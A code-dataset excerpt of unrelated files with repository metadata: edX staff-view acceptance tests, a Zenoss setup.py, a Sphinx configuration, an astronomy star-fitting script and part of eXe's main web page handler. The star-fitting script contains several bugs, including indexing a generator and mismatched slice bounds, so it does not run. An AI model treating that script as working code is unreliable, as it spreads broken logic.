msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully rescored problem for user {}'.format(self.USERNAME), msg)
def test_rescore_problem_if_higher(self):
"""
Rescore the student
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.rescore_if_higher()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully rescored problem to improve score for user {}'.format(self.USERNAME), msg)
def test_student_state_delete(self):
"""
Successfully delete the student state with an answer
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.delete_state()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully deleted student state for user {}'.format(self.USERNAME), msg)
def test_student_by_email(self):
"""
Successfully reset the student attempts using their email address
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.reset_attempts(self.EMAIL)
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully reset the attempts for user {}'.format(self.EMAIL), msg)
def test_bad_student(self):
"""
Test negative response with invalid user
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.delete_state('INVALIDUSER')
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Failed to delete student state for user. User does not exist.', msg)
def test_reset_attempts_for_problem_loaded_via_ajax(self):
"""
Successfully reset the student attempts for problem loaded via ajax.
"""
staff_page = self._goto_staff_page()
staff_page.load_problem_via_ajax()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.reset_attempts()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully reset the attempts for user {}'.format(self.USERNAME), msg)
def test_rescore_state_for_problem_loaded_via_ajax(self):
"""
Rescore the student for problem loaded via ajax.
"""
staff_page = self._goto_staff_page()
staff_page.load_problem_via_ajax()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.rescore()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully rescored problem for user {}'.format(self.USERNAME), msg)
def test_student_state_delete_for_problem_loaded_via_ajax(self):
"""
Successfully delete the student state for problem loaded via ajax.
"""
staff_page = self._goto_staff_page()
staff_page.load_problem_via_ajax()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.delete_state()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully deleted student state for user {}'.format(self.USERNAME), msg)
class CourseWithContentGroupsTest(StaffViewTest):
"""
Verifies that changing the "View this course as" selector works properly for content groups.
"""
def setUp(self):
super(CourseWithContentGroupsTest, self).setUp()
# pylint: disable=protected-access
self.course_fixture._update_xblock(self.course_fixture._course_location, {
"metadata": {
u"user_partitions": [
create_user_partition_json(
MINIMUM_STATIC_PARTITION_ID,
'Configuration alpha,beta',
'Content Group Partition',
[
Group(MINIMUM_STATIC_PARTITION_ID + 1, 'alpha'),
Group(MINIMUM_STATIC_PARTITION_ID + 2, 'beta')
],
scheme="cohort"
)
],
},
})
def populate_course_fixture(self, course_fixture):
"""
Populates test course with chapter, sequential, and 3 problems.
One problem is visible to all, one problem is visible only to Group "alpha", and
one problem is visible only to Group "beta".
"""
problem_data = dedent("""
<problem markdown="Simple Problem" max_attempts="" weight="">
<choiceresponse>
<label>Choose Yes.</label>
<checkboxgroup>
<choice correct="true">Yes</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""")
self.alpha_text = "VISIBLE TO ALPHA"
self.beta_text = "VISIBLE TO BETA"
self.audit_text = "VISIBLE TO AUDIT"
self.everyone_text = "VISIBLE TO EVERYONE"
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc(
'problem',
self.alpha_text,
data=problem_data,
metadata={"group_access": {MINIMUM_STATIC_PARTITION_ID: [MINIMUM_STATIC_PARTITION_ID + 1]}}
),
XBlockFixtureDesc(
'problem',
self.beta_text,
data=problem_data,
metadata={"group_access": {MINIMUM_STATIC_PARTITION_ID: [MINIMUM_STATIC_PARTITION_ID + 2]}}
),
XBlockFixtureDesc(
'problem',
self.audit_text,
data=problem_data,
# Below 1 is the hardcoded group ID for "Audit"
metadata={"group_access": {ENROLLMENT_TRACK_PARTITION_ID: [1]}}
),
XBlockFixtureDesc(
'problem',
self.everyone_text,
data=problem_data
)
)
)
)
)
@attr(shard=20)
def test_staff_sees_all_problems(self):
"""
Scenario: Staff see all problems
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
Then I see all the problems, regardless of their group_access property
"""
course_page = self._goto_staff_page()
verify_expected_problem_visibility(
self,
course_page,
[self.alpha_text, self.beta_text, self.audit_text, self.everyone_text]
)
@attr(shard=3)
def test_student_not_in_content_group(self):
"""
Scenario: When previewing as a learner, only content visible to all is shown
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner
Then I see only problems visible to all users
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner')
verify_expected_problem_visibility(self, course_page, [self.everyone_text])
@attr(shard=3)
def test_as_student_in_alpha(self):
"""
Scenario: When previewing as a learner in group alpha, only content visible to alpha is shown
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner in group alpha
Then I see only problems visible to group alpha
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner in alpha')
verify_expected_problem_visibility(self, course_page, [self.alpha_text, self.everyone_text])
@attr(shard=3)
def test_as_student_in_beta(self):
"""
Scenario: When previewing as a learner in group beta, only content visible to beta is shown
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner in group beta
Then I see only problems visible to group beta
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner in beta')
verify_expected_problem_visibility(self, course_page, [self.beta_text, self.everyone_text])
@attr(shard=3)
def test_as_student_in_audit(self):
"""
Scenario: When previewing as a learner in the audit enrollment track, only content visible to audit is shown
Given I have a course with an enrollment_track user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner in audit enrollment track
Then I see only problems visible to audit enrollment track
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner in Audit')
verify_expected_problem_visibility(self, course_page, [self.audit_text, self.everyone_text])
def create_cohorts_and_assign_students(self, student_a_username, student_b_username):
"""
Adds 2 manual cohorts, linked to content groups, to the course.
Each cohort is assigned one learner.
"""
instructor_dashboard_page = InstructorDashboardPage(self.browser, self.course_id)
instructor_dashboard_page.visit()
cohort_management_page = instructor_dashboard_page.select_cohort_management()
cohort_management_page.is_cohorted = True
def add_cohort_with_student(cohort_name, content_group, student):
""" Create cohort and assign learner to it. """
cohort_management_page.add_cohort(cohort_name, content_group=content_group)
cohort_management_page.add_students_to_selected_cohort([student])
add_cohort_with_student("Cohort Alpha", "alpha", student_a_username)
add_cohort_with_student("Cohort Beta", "beta", student_b_username)
cohort_management_page.wait_for_ajax()
@attr('a11y')
def test_course_page(self):
"""
Run accessibility audit for course staff pages.
"""
course_page = self._goto_staff_page()
course_page.a11y_audit.config.set_rules({
'ignore': [
'aria-allowed-attr', # TODO: AC-559
'aria-roles', # TODO: AC-559,
'aria-valid-attr', # TODO: AC-559
'color-contrast', # TODO: AC-559
'link-href', # TODO: AC-559
'section', # TODO: AC-559
]
})
course_page.a11y_audit.check_for_accessibility_errors()
def verify_expected_problem_visibility(test, courseware_page, expected_problems):
"""
Helper method that checks that the expected problems are visible on the current page.
"""
courseware_page.wait_for(
lambda: courseware_page.num_xblock_components == len(expected_problems), "Expected number of problems visible"
)
for index, expected_problem in enumerate(expected_problems):
test.assertIn(expected_problem, courseware_page.xblock_components[index].text)
|
philanthropy-u/edx-platform
|
common/test/acceptance/tests/lms/test_lms_user_preview.py
|
Python
|
agpl-3.0
| 17,913
|
[
"VisIt"
] |
f4246c3e31579ba529b2bc07cb06af2cfb9791205cb147a7f0d1d1351ebc17d2
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2008, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
################################
# These variables are overwritten by Zenoss when the ZenPack is exported
# or saved. Do not modify them directly here.
NAME = 'ZenPacks.AndreaConsadori.ASSP'
VERSION = '1.1'
AUTHOR = 'Andrea Consadori'
LICENSE = ''
NAMESPACE_PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori']
PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori', 'ZenPacks.AndreaConsadori.ASSP']
INSTALL_REQUIRES = []
COMPAT_ZENOSS_VERS = '>=2.2'
PREV_ZENPACK_NAME = ''
# STOP_REPLACEMENTS
################################
# Zenoss will not overwrite any changes you make below here.
from setuptools import setup, find_packages
setup(
# This ZenPack metadata should usually be edited with the Zenoss
# ZenPack edit page. Whenever the edit page is submitted it will
# overwrite the values below (the ones it knows about) with new values.
name = NAME,
version = VERSION,
author = AUTHOR,
license = LICENSE,
# This is the version spec which indicates what versions of Zenoss
# this ZenPack is compatible with
compatZenossVers = COMPAT_ZENOSS_VERS,
# previousZenPackName is a facility for telling Zenoss that the name
# of this ZenPack has changed. If no ZenPack with the current name is
# installed then a zenpack of this name if installed will be upgraded.
prevZenPackName = PREV_ZENPACK_NAME,
# Indicate to setuptools which namespace packages the zenpack
# participates in
namespace_packages = NAMESPACE_PACKAGES,
# Tell setuptools what packages this zenpack provides.
packages = find_packages(),
# Tell setuptools to figure out for itself which files to include
# in the binary egg when it is built.
include_package_data = True,
# Tell setuptools what non-python files should also be included
# with the binary egg.
package_data = {
'': ['*.txt'],
'':['../COPYRIGHT.txt','../LICENSE.txt'],
NAME: ['objects/*','skins/*/*','services/*', 'reports/*/*',
'modeler/*/*', 'daemons/*', 'lib/*', 'libexec/*',
'datasources/*', ],
},
# Indicate dependencies on other python modules or ZenPacks. This line
# is modified by zenoss when the ZenPack edit page is submitted. Zenoss
# tries to put add/delete the names it manages at the beginning of this
# list, so any manual additions should be added to the end. Things will
# go poorly if this line is broken into multiple lines or modified to
# dramatically.
install_requires = INSTALL_REQUIRES,
# Every ZenPack egg must define exactly one zenoss.zenpacks entry point
# of this form.
entry_points = {
'zenoss.zenpacks': '%s = %s' % (NAME, NAME),
},
# All ZenPack eggs must be installed in unzipped form.
zip_safe = False,
)
|
zenoss/Community-Zenpacks
|
ZenPacks.AndreaConsadori.ASSP/setup.py
|
Python
|
gpl-2.0
| 3,327
|
[
"VisIt"
] |
514c0b7f6d699457587545c4b0f2f7cc8badc7b3be2f6414066d2e19884e967e
|
# -*- coding: utf-8 -*-
#
# Asterisk IVR documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 14 16:14:39 2016.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
#import mock
from mock import MagicMock
#
MOCK_MODULES = ['asterisk.agi', 'asterisk.agi.AGI', 'asterisk.agi.AGI.answer']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = MagicMock()
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../ivr'))
autoclass_content = 'both'
#html_style = 'css/my_theme.css'
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
#extensions = ['sphinx.ext.autodoc',]
extensions = ['sphinx.ext.autodoc','sphinx.ext.napoleon',]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Asterisk IVR'
copyright = u'2016, Brian LaVallee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.2'
# The full version, including alpha/beta/rc tags.
release = '0.0.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'AsteriskIVRdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'AsteriskIVR.tex', u'Asterisk IVR Documentation',
u'Brian LaVallee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
invitecomm/asterisk-ivr
|
docs/conf.py
|
Python
|
gpl-3.0
| 6,709
|
[
"Brian"
] |
83894ba7dd98eeb8b05cf433ab1753b422a90865b1ee3eabbae5260e8ce793b9
|
#!/usr/bin/env python
import os
import numpy as np
from astropy.io import fits
import scipy.optimize
import scipy.signal
from scipy.misc import imsave
import scipy.ndimage
def gaussian(coordinates, height, *centroid_and_width):
"""
The n-dimensional symmetric Gaussian distribution
Expects coordinates x that look like [y0,y1,x0,x1] where y0 and y1 bound the
y-values of the output, or x looks like [y1,y2,y3,...,x1,x2,x3,...]
gaussian Integral = height*2*np.pi*np.sqrt(width)
"""
width = centroid_and_width[-1]
centroids = centroid_and_width[:-1]
pos = coordinates.reshape((len(centroids),-1)).copy()
for i in range(len(centroids)):
pos[i] -= centroids[i]
dst = np.sum(pos**2,0)
return height*np.exp(-dst/(2*width**2))
def genfiles(path, file_extension='fits'):
"""Produce a generator that yields files ending with file_extension in directory path"""
for entry in os.scandir(path):
if entry.is_file() and entry.name.endswith(file_extension):
yield entry.path
if __name__ == "__main__":
EXTENSIONS = ['fits', 'fit']
INPUT_DIR = "../sample_data"
OUTPUT_DIR = "."
FILTER_WIDTH = 1.5
APERTURE_RADIUS = 5
files = genfiles(INPUT_DIR)
# Open up the first file to figure out how big the images are so we can know the shape of the array to allocate
image = fits.open(files[0])[0].data
stack = np.empty((len(files),)+image.shape)
stack[0] = image.copy()
for f, fname in enumerate(files[1:]):
stack[f] = fits.open(fname)[0].data
stacked = np.median(stack, axis=0, overwrite_input=True)
smooth = scipy.ndimage.gaussian_filter(stacked, FILTER_WIDTH)
laplace = scipy.ndimage.laplace(smooth)
stars = laplace < 0
stars_inds = scipy.signal.argrelmin(laplace)
stars = np.zeros(stacked.shape, bool)
stars[stars_inds] = True
sky_value = np.median(stacked)
signal = stacked > (sky_value + 2*np.sqrt(sky_value))
stars &= signal
coordinates = np.mgrid[:stacked.shape[0], :stacked.shape[1]]
coord = np.mgrid[:2*APERTURE_RADIUS+1, :2*APERTURE_RADIUS+1]
dst = np.sum(coord**2,0)
ap = dst <= APERTURE_RADIUS**2
star_coordinates = np.where(stars)
star_vectors = np.empty((star_coordinates.shape[0], ))
output_test = np.zeros(stacked.shape)
for i, (y, x) in enumerate(star_coordinates):
star_coordinates = coordinates[y-APERTURE_RADIUS:y+APERTURE_RADIUS+1,
x-APERTURE_RADIUS:x+APERTURE_RADIUS+1][ap]
star_data = stacked[y-APERTURE_RADIUS:x+APERTURE_RADIUS+1][ap]
guesses = [stacked[y, x]-sky_value, y, x, 1., sky_value]
fit, _ = scipy.optimize.curve_fit(gaussian, star_coordinates, star_data, p0=guesses)
star_vectors[i] = fit
output_test[y-APERTURE_RADIUS:y+APERTURE_RADIUS+1,
x-APERTURE_RADIUS:x+APERTURE_RADIUS+1][ap] += gaussian(star_coordinates, *fit)
np.save('vectorized.npy',star_vectors)
imsave('vectorized.png',np.log(output_test))
|
Saethlin/astrotools
|
vectorize_starfield.py
|
Python
|
mit
| 3,096
|
[
"Gaussian"
] |
7e782631efb8b5ffb096f4b60b38d9703734d3891c4683c70317dc0619211899
|
# -- coding: utf-8 --
# ===========================================================================
# eXe
# Copyright 2012, Pedro Peña Pérez, Open Phoenix IT
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ===========================================================================
"""
This is the main Javascript page.
"""
import os
import json
import sys
import logging
import traceback
import shutil
import tempfile
from exe.engine.version import release, revision
from twisted.internet import threads, reactor
from exe.webui.livepage import RenderableLivePage,\
otherSessionPackageClients, allSessionClients, allSessionPackageClients
from nevow import loaders, inevow, tags
from nevow.livepage import handler, IClientHandle
from exe.jsui.idevicepane import IdevicePane
from exe.jsui.outlinepane import OutlinePane
from exe.jsui.recentmenu import RecentMenu
from exe.jsui.stylemenu import StyleMenu
from exe.jsui.propertiespage import PropertiesPage
from exe.webui.authoringpage import AuthoringPage
from exe.webui.renderable import File
from exe.export.websiteexport import WebsiteExport
from exe.export.textexport import TextExport
from exe.export.singlepageexport import SinglePageExport
from exe.export.scormexport import ScormExport
from exe.export.imsexport import IMSExport
from exe.export.xliffexport import XliffExport
from exe.importers.xliffimport import XliffImport
from exe.importers.scanresources import Resources
from exe.engine.path import Path, toUnicode, TempDirPath
from exe.engine.package import Package
from exe import globals as G
from tempfile import mkdtemp
from exe.engine.mimetex import compile
from urllib import unquote, urlretrieve
from exe.engine.locationbuttons import LocationButtons
from exe.export.epub3export import Epub3Export
from exe.export.xmlexport import XMLExport
from exe.engine.lom import lomsubs
from exe.engine.lom.lomclassification import Classification
import zipfile
log = logging.getLogger(__name__)
class MainPage(RenderableLivePage):
"""
This is the main Javascript page. Responsible for handling URLs.
"""
_templateFileName = 'mainpage.html'
name = 'to_be_defined'
def __init__(self, parent, package, session, config):
"""
Initialize a new Javascript page
'package' is the package that we look after
"""
self.name = package.name
self.session = session
RenderableLivePage.__init__(self, parent, package, config)
self.putChild("resources", File(package.resourceDir))
#styles directory
#self.putChild("stylecss", File(self.config.stylesDir)
mainjs = Path(self.config.jsDir).joinpath('templates', 'mainpage.html')
self.docFactory = loaders.htmlfile(mainjs)
# Create all the children on the left
self.outlinePane = OutlinePane(self)
self.idevicePane = IdevicePane(self)
self.styleMenu = StyleMenu(self)
self.recentMenu = RecentMenu(self)
# And in the main section
self.propertiesPage = PropertiesPage(self)
self.authoringPage = None
self.previewDir = None
self.authoringPages = {}
self.classificationSources = {}
G.application.resourceDir=Path(package.resourceDir);
self.location_buttons = LocationButtons()
def child_authoring(self, ctx):
"""Returns the authoring page that corresponds to the url http://127.0.0.1:port/package_name/authoring"""
request = inevow.IRequest(ctx)
if 'clientHandleId' in request.args:
clientid = request.args['clientHandleId'][0]
if clientid not in self.authoringPages:
self.authoringPages[clientid] = AuthoringPage(self)
self.children.pop('authoring')
return self.authoringPages[clientid]
else:
raise Exception('No clientHandleId in request')
def child_preview(self, ctx):
if not self.package.previewDir:
stylesDir = self.config.stylesDir / self.package.style
self.package.previewDir = TempDirPath()
self.exportWebSite(None, self.package.previewDir, stylesDir)
self.previewPage = File(self.package.previewDir / self.package.name)
return self.previewPage
def child_taxon(self, ctx):
"""
Doc
"""
request = inevow.IRequest(ctx)
data = []
if 'source' in request.args:
if 'identifier' in request.args:
source = request.args['source'][0]
if source:
if not source in self.classificationSources:
self.classificationSources[source] = Classification()
try:
self.classificationSources[source].setSource(source, self.config.configDir)
except:
pass
identifier = request.args['identifier'][0]
if identifier == 'false':
identifier = False
if source.startswith("etb-lre_mec-ccaa"):
stype = 2
else:
stype = 1
try:
data = self.classificationSources[source].getDataByIdentifier(identifier, stype=stype)
except:
pass
return json.dumps({'success': True, 'data': data})
def goingLive(self, ctx, client):
"""Called each time the page is served/refreshed"""
# inevow.IRequest(ctx).setHeader('content-type', 'application/vnd.mozilla.xul+xml')
# Set up named server side funcs that js can call
def setUpHandler(func, name, *args, **kwargs):
"""
Convience function link funcs to hander ids
and store them
"""
kwargs['identifier'] = name
hndlr = handler(func, *args, **kwargs)
hndlr(ctx, client) # Stores it
setUpHandler(self.handleIsPackageDirty, 'isPackageDirty')
setUpHandler(self.handlePackageFileName, 'getPackageFileName')
setUpHandler(self.handleSavePackage, 'savePackage')
setUpHandler(self.handleLoadPackage, 'loadPackage')
setUpHandler(self.recentMenu.handleLoadRecent, 'loadRecent')
setUpHandler(self.handleLoadTutorial, 'loadTutorial')
setUpHandler(self.recentMenu.handleClearRecent, 'clearRecent')
setUpHandler(self.handleImport, 'importPackage')
setUpHandler(self.handleCancelImport, 'cancelImportPackage')
setUpHandler(self.handleExport, 'exportPackage')
setUpHandler(self.handleXliffExport, 'exportXliffPackage')
setUpHandler(self.handleQuit, 'quit')
setUpHandler(self.handleBrowseURL, 'browseURL')
setUpHandler(self.handleMergeXliffPackage, 'mergeXliffPackage')
setUpHandler(self.handleInsertPackage, 'insertPackage')
setUpHandler(self.handleExtractPackage, 'extractPackage')
setUpHandler(self.outlinePane.handleSetTreeSelection,
'setTreeSelection')
setUpHandler(self.handleClearAndMakeTempPrintDir,
'makeTempPrintDir')
setUpHandler(self.handleRemoveTempDir, 'removeTempDir')
setUpHandler(self.handleTinyMCEimageChoice, 'previewTinyMCEimage')
setUpHandler(self.handleTinyMCEmath, 'generateTinyMCEmath')
setUpHandler(self.handleTestPrintMsg, 'testPrintMessage')
setUpHandler(self.handleReload, 'reload')
setUpHandler(self.handleSourcesDownload, 'sourcesDownload')
#For the new ExtJS 4.0 interface
setUpHandler(self.outlinePane.handleAddChild, 'AddChild')
setUpHandler(self.outlinePane.handleDelNode, 'DelNode')
setUpHandler(self.outlinePane.handleRenNode, 'RenNode')
setUpHandler(self.outlinePane.handlePromote, 'PromoteNode')
setUpHandler(self.outlinePane.handleDemote, 'DemoteNode')
setUpHandler(self.outlinePane.handleUp, 'UpNode')
setUpHandler(self.outlinePane.handleDown, 'DownNode')
setUpHandler(self.handleCreateDir, 'CreateDir')
self.idevicePane.client = client
self.styleMenu.client = client
self.webServer.stylemanager.client = client
if not self.webServer.monitoring:
self.webServer.monitoring = True
self.webServer.monitor()
def render_config(self, ctx, data):
config = {'lastDir': G.application.config.lastDir,
'locationButtons': self.location_buttons.buttons,
'lang': G.application.config.locale.split('_')[0],
'showPreferences': G.application.config.showPreferencesOnStart == '1' and not G.application.preferencesShowed,
'loadErrors': G.application.loadErrors,
'showIdevicesGrouped': G.application.config.showIdevicesGrouped == '1',
'authoringIFrameSrc': '%s/authoring?clientHandleId=%s' % (self.package.name, IClientHandle(ctx).handleId),
'pathSep': os.path.sep
}
G.application.preferencesShowed = True
G.application.loadErrors = []
return tags.script(type="text/javascript")["var config = %s" % json.dumps(config)]
def render_jsuilang(self, ctx, data):
return ctx.tag(src="../jsui/i18n/" + unicode(G.application.config.locale) + ".js")
def render_extjslang(self, ctx, data):
return ctx.tag(src="../jsui/extjs/locale/ext-lang-" + unicode(G.application.config.locale) + ".js")
def render_htmllang(self, ctx, data):
lang = G.application.config.locale.replace('_', '-').split('@')[0]
attribs = {'lang': unicode(lang), 'xml:lang': unicode(lang), 'xmlns': 'http://www.w3.org/1999/xhtml'}
return ctx.tag(**attribs)
def render_version(self, ctx, data):
return [tags.p()["Version: %s" % release],tags.p()["Revision: %s" % revision]]
def handleTestPrintMsg(self, client, message):
"""
Prints a test message, and yup, that's all!
"""
print "Test Message: ", message, " [eol, eh!]"
def handleIsPackageDirty(self, client, ifClean, ifDirty):
"""
Called by js to know if the package is dirty or not.
ifClean is JavaScript to be evaled on the client if the package has
been changed
ifDirty is JavaScript to be evaled on the client if the package has not
been changed
"""
if self.package.isChanged:
client.sendScript(ifDirty)
else:
client.sendScript(ifClean)
def handlePackageFileName(self, client, onDone, onDoneParam):
"""
Calls the javascript func named by 'onDone' passing as the
only parameter the filename of our package. If the package
has never been saved or loaded, it passes an empty string
'onDoneParam' will be passed to onDone as a param after the
filename
"""
client.call(onDone, unicode(self.package.filename), onDoneParam)
def b4save(self, client, inputFilename, ext, msg):
"""
Call this before saving a file to get the right filename.
Returns a new filename or 'None' when attempt to overide
'inputFilename' is the filename given by the user
'ext' is the extension that the filename should have
'msg' will be shown if the filename already exists
"""
if not inputFilename.lower().endswith(ext):
inputFilename += ext
if Path(inputFilename).exists():
explanation = _(u'"%s" already exists.\nPlease try again with a different filename') % inputFilename
msg = u'%s\n%s' % (msg, explanation)
client.alert(msg)
raise Exception(msg)
return inputFilename
def handleSavePackage(self, client, filename=None, onDone=None):
"""
Save the current package
'filename' is the filename to save the package to
'onDone' will be evaled after saving instead or redirecting
to the new location (in cases of package name changes).
(This is used where the user goes file|open when their
package is changed and needs saving)
"""
filename = Path(filename, 'utf-8')
saveDir = filename.dirname()
if saveDir and not saveDir.isdir():
client.alert(_(u'Cannot access directory named ') + unicode(saveDir) + _(u'. Please use ASCII names.'))
return
oldName = self.package.name
# If the script is not passing a filename to us,
# Then use the last filename that the package was loaded from/saved to
if not filename:
filename = self.package.filename
assert filename, 'Somehow save was called without a filename on a package that has no default filename.'
# Add the extension if its not already there and give message if not saved
filename = self.b4save(client, filename, '.elp', _(u'SAVE FAILED!'))
try:
self.package.save(filename) # This can change the package name
except Exception, e:
client.alert(_('SAVE FAILED!\n%s') % str(e))
raise
# Tell the user and continue
if onDone:
client.alert(_(u'Package saved to: %s') % filename, onDone)
elif self.package.name != oldName:
# Redirect the client if the package name has changed
self.webServer.root.putChild(self.package.name, self)
log.info('Package saved, redirecting client to /%s' % self.package.name)
client.alert(_(u'Package saved to: %s') % filename, 'eXe.app.gotoUrl("/%s")' % self.package.name.encode('utf8'), \
filter_func=otherSessionPackageClients)
else:
client.alert(_(u'Package saved to: %s') % filename, filter_func=otherSessionPackageClients)
def handleLoadPackage(self, client, filename, filter_func=None):
"""Load the package named 'filename'"""
package = self._loadPackage(client, filename, newLoad=True)
self.session.packageStore.addPackage(package)
self.webServer.root.bindNewPackage(package, self.session)
client.sendScript((u'eXe.app.gotoUrl("/%s")' % \
package.name).encode('utf8'), filter_func=filter_func)
def handleLoadTutorial(self, client):
"""
Loads the tutorial file, from the Help menu
"""
filename = self.config.webDir.joinpath("docs")\
.joinpath("eXe-tutorial.elp")
self.handleLoadPackage(client, filename)
def progressDownload(self, numblocks, blocksize, filesize, client):
try:
percent = min((numblocks * blocksize * 100) / filesize, 100)
except:
percent = 100
